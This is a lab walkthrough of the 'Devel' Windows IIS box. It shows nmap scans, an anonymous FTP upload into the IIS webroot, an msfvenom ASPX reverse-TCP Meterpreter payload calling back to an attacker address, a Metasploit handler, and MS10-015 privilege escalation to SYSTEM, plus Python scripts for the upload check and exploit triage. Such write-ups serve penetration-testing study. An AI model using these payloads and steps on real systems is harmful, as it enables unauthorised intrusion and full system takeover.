devel.md

Nmap

▶ nmap -Pn -sS -p- -T4 --min-rate 5000 10.10.10.5 -oN surface.scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 15:28 IST
Nmap scan report for 10.10.10.5
Host is up (0.26s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds
▶ nmap -sC -sV -p 21,80 --min-rate 5000 10.10.10.5 -oN deep.scan

Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-07 15:31 IST
Nmap scan report for 10.10.10.5
Host is up (0.26s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.37 seconds

FTP

  • Anonymous login is allowed (FTP code 230 in the ftp-anon output above). Logging in as anonymous lists aspnet_client, iisstart.htm and welcome.png in the FTP root.

HTTP

  • Port 80 serves the default IIS 7.5 welcome page (title IIS7). That page is iisstart.htm, which embeds welcome.png, the same files listed in the FTP root.

Foothold

  • The anonymous FTP root contains exactly the files IIS serves (iisstart.htm, welcome.png, aspnet_client), so the FTP root is almost certainly the IIS webroot. If anonymous uploads are allowed, anything uploaded over FTP can be requested directly in the browser, and IIS will execute it if it is a server-side page (for example .aspx).

  • Confirm this with a harmless file first: upload a text file with a random name over FTP, then request http://10.10.10.5/<name> in the browser. If the contents come back, uploads land in the webroot.
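Added example (not part of the original writeup): a Python script that performs the two checks in this section programmatically. It parses the deep.scan output from the page (embedded below) to confirm that anonymous FTP is allowed and that the FTP root holds the IIS default files, then uploads a random marker file over FTP and requests it back over HTTP. The marker check takes the upload and fetch operations as callables so the logic can be exercised offline; the host 10.10.10.5 and the anonymous login come from the page, while the function names and the marker naming scheme are the example's own.

```python
"""Added example (not part of the original writeup): check whether the
anonymous FTP root on 10.10.10.5 is the IIS webroot by uploading a random
marker over FTP and requesting it back over HTTP."""
import ftplib
import io
import re
import secrets
import sys
import urllib.error
import urllib.request

# Excerpt of the deep.scan output from this page, embedded so the parser
# can run offline.
NMAP_DEEP_SCAN = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# ftp-anon listing lines look like "| MM-DD-YY HH:MMxM <DIR>-or-size name"
ENTRY_RE = re.compile(r"^\|_?\s*\d\d-\d\d-\d\d\s+\S+\s+(?:<DIR>|\d+)\s+(.+?)\s*$")
IIS_DEFAULT_FILES = {"iisstart.htm", "welcome.png", "aspnet_client"}


def parse_nmap(text):
    """Return (anonymous_allowed, ftp_root_listing, {port: service})."""
    anonymous = False
    listing = []
    services = {}
    in_ftp = False
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            services[int(m.group(1))] = m.group(2)
            in_ftp = m.group(2) == "ftp"
            continue
        if not in_ftp:
            continue
        if "Anonymous FTP login allowed" in line:
            anonymous = True
        e = ENTRY_RE.match(line)
        if e:
            listing.append(e.group(1))
    return anonymous, listing, services


def looks_like_webroot(listing):
    """The IIS default-site files sitting in the FTP root are the tell."""
    return bool(IIS_DEFAULT_FILES & set(listing))


def ftp_and_http_share_root(upload, fetch):
    """upload(name, data) stores a file via FTP; fetch(name) returns the bytes
    HTTP serves for /name, or None on 404. True means an upload is
    immediately reachable through the web server."""
    name = f"marker-{secrets.token_hex(4)}.txt"   # random name: cannot collide
    data = secrets.token_hex(16).encode()         # random body: a cached page cannot fool us
    upload(name, data)
    served = fetch(name)
    return served is not None and served.strip() == data


def ftp_uploader(host, port=21):
    """Real FTP upload using the anonymous login the scan reported."""
    def upload(name, data):
        with ftplib.FTP() as ftp:
            ftp.connect(host, port, timeout=10)
            ftp.login("anonymous", "anonymous")
            ftp.storbinary(f"STOR {name}", io.BytesIO(data))
    return upload


def http_fetcher(host, port=80):
    """Real HTTP GET; a 404 (or any HTTP error) means the file is not served."""
    def fetch(name):
        try:
            with urllib.request.urlopen(f"http://{host}:{port}/{name}", timeout=10) as resp:
                return resp.read()
        except urllib.error.HTTPError:
            return None
    return fetch


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.5"
    anonymous, listing, services = parse_nmap(NMAP_DEEP_SCAN)
    if not (anonymous and looks_like_webroot(listing) and 80 in services):
        sys.exit("scan does not suggest a writable webroot")
    if ftp_and_http_share_root(ftp_uploader(host), http_fetcher(host)):
        print("FTP root is the IIS webroot: uploaded files are served over HTTP")
    else:
        print("marker not served back; uploads do not land in the webroot")
```

The marker file is left on the server, just as the manual test file is; delete it over FTP when done. Because the body is random, a positive result proves the bytes you wrote are the bytes IIS serves, which is what matters before uploading an executable page.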

MSFVenom

  • Generate an ASPX payload with MSFVenom that calls back to the attacker with a reverse TCP Meterpreter. LHOST is the attacker's VPN (tun0) address and LPORT must match the listener started below.
▶ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.54 LPORT=4444 -f aspx -o rsp.aspx
  • Upload rsp.aspx over anonymous FTP, the same way the test file was uploaded.
  • Start the listener in msfconsole before requesting the payload, with the same payload, LHOST and LPORT used in msfvenom.
▶ sudo msfdb run
▶ use exploit/multi/handler
▶ set payload windows/meterpreter/reverse_tcp
▶ set LHOST tun0
▶ set LPORT 4444
▶ run
  • Request http://10.10.10.5/rsp.aspx in the browser. IIS executes the page and a Meterpreter session opens on the handler.
  • View system information from the Meterpreter session.
meterpreter> sysinfo
  • Check which user the payload runs as, then drop into a Windows command shell to collect the details the exploit suggester needs. getuid is a Meterpreter command; inside cmd.exe use whoami instead.
meterpreter> getuid
meterpreter> shell
c:\windows\system32\inetsrv>whoami
c:\windows\system32\inetsrv>systeminfo
  • Exit the command shell (exit) and background the Meterpreter session (background) so msfconsole can run post modules against it.
  • Search for the local exploit suggester and load it.
▶ search suggester
▶ use post/multi/recon/local_exploit_suggester
  • Point it at the session (check the ID with sessions -l) and run it.
▶ set SESSION 1
▶ run
  • It lists the local exploits whose checks pass for this host; exploit/windows/local/ms10_015_kitrap0d is among them.
  • Use the exploit.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
  • Set the exploit options: the existing session and a callback for the new payload. Use a different LPORT from the first handler, which is still bound to 4444.
▶ set SESSION 1
▶ set LHOST tun0
▶ set LPORT 4445
▶ run
  • A new Meterpreter session opens; if the exploit succeeded, getuid reports NT AUTHORITY\SYSTEM.
meterpreter> getuid
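Added example (not part of the original writeup, and not the Metasploit module's own code): the triage the local exploit suggester performs, reduced to the single candidate this page uses, ms10_015_kitrap0d, and run over systeminfo text. MS10-015 covers 32-bit Windows 2000 through Windows 7 / Server 2008 R2 kernels and its fix is KB977165; the script parses the OS version, architecture and installed hotfixes and reports whether the exploit is worth trying. The two systeminfo samples are constructed for the example, not captured from the box; the function names are the example's own.

```python
"""Added example (not part of the original writeup): the check behind
ms10_015_kitrap0d as the exploit suggester would apply it, run over
`systeminfo` output. The exploit needs a 32-bit session on a Windows 2000
through Windows 7 / Server 2008 R2 kernel that lacks the MS10-015 fix,
KB977165."""
import re

# Constructed sample systeminfo output (not captured from the box): an
# unpatched 32-bit Windows 7 build and, for contrast, a patched x64 host.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

SYSTEMINFO_PATCHED = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB977165
                           [02]: KB2533623
"""

FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z() ]*?):\s+(.*)$")   # "Field:   value"
KB_RE = re.compile(r"\bKB\d{6,7}\b")                            # hotfix identifiers
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")                 # major.minor.build

# Kernel versions MS10-015 covers: 2000 (5.0), XP (5.1), 2003 (5.2),
# Vista / 2008 (6.0), 7 / 2008 R2 (6.1). Windows 8 and later are unaffected.
MS10_015_KERNELS = {(5, 0), (5, 1), (5, 2), (6, 0), (6, 1)}
MS10_015_FIX = "KB977165"


def parse_systeminfo(text):
    """Return the 'Field: value' pairs plus every KB number seen in the text."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            info[m.group(1)] = m.group(2).strip()
        # hotfix lines are indented "[NN]: KB......" and carry no field name
        info["hotfixes"].extend(KB_RE.findall(line))
    return info


def ms10_015_candidate(info):
    """Return (applicable, reasons_it_is_not) for ms10_015_kitrap0d."""
    reasons = []
    v = VERSION_RE.search(info.get("OS Version", ""))
    if v is None:
        reasons.append("OS Version not found in systeminfo output")
    elif (int(v.group(1)), int(v.group(2))) not in MS10_015_KERNELS:
        reasons.append(f"kernel {v.group(1)}.{v.group(2)} is not affected by MS10-015")
    if "x86" not in info.get("System Type", "").lower():
        reasons.append("not an x86 system; ms10_015_kitrap0d needs a 32-bit target")
    if MS10_015_FIX in info["hotfixes"]:
        reasons.append(f"{MS10_015_FIX} (the MS10-015 fix) is installed")
    return not reasons, reasons


if __name__ == "__main__":
    for label, text in (("unpatched", SYSTEMINFO_UNPATCHED), ("patched", SYSTEMINFO_PATCHED)):
        ok, why = ms10_015_candidate(parse_systeminfo(text))
        print(f"{label}: {'candidate' if ok else 'skip'}", *why, sep="\n  ")
```

The architecture check matters as much as the patch level: a 64-bit Meterpreter session on an otherwise vulnerable host will not work with this module, and the suggester filters on the session's architecture for the same reason. Paste real systeminfo output into the script to triage a host without the Metasploit session.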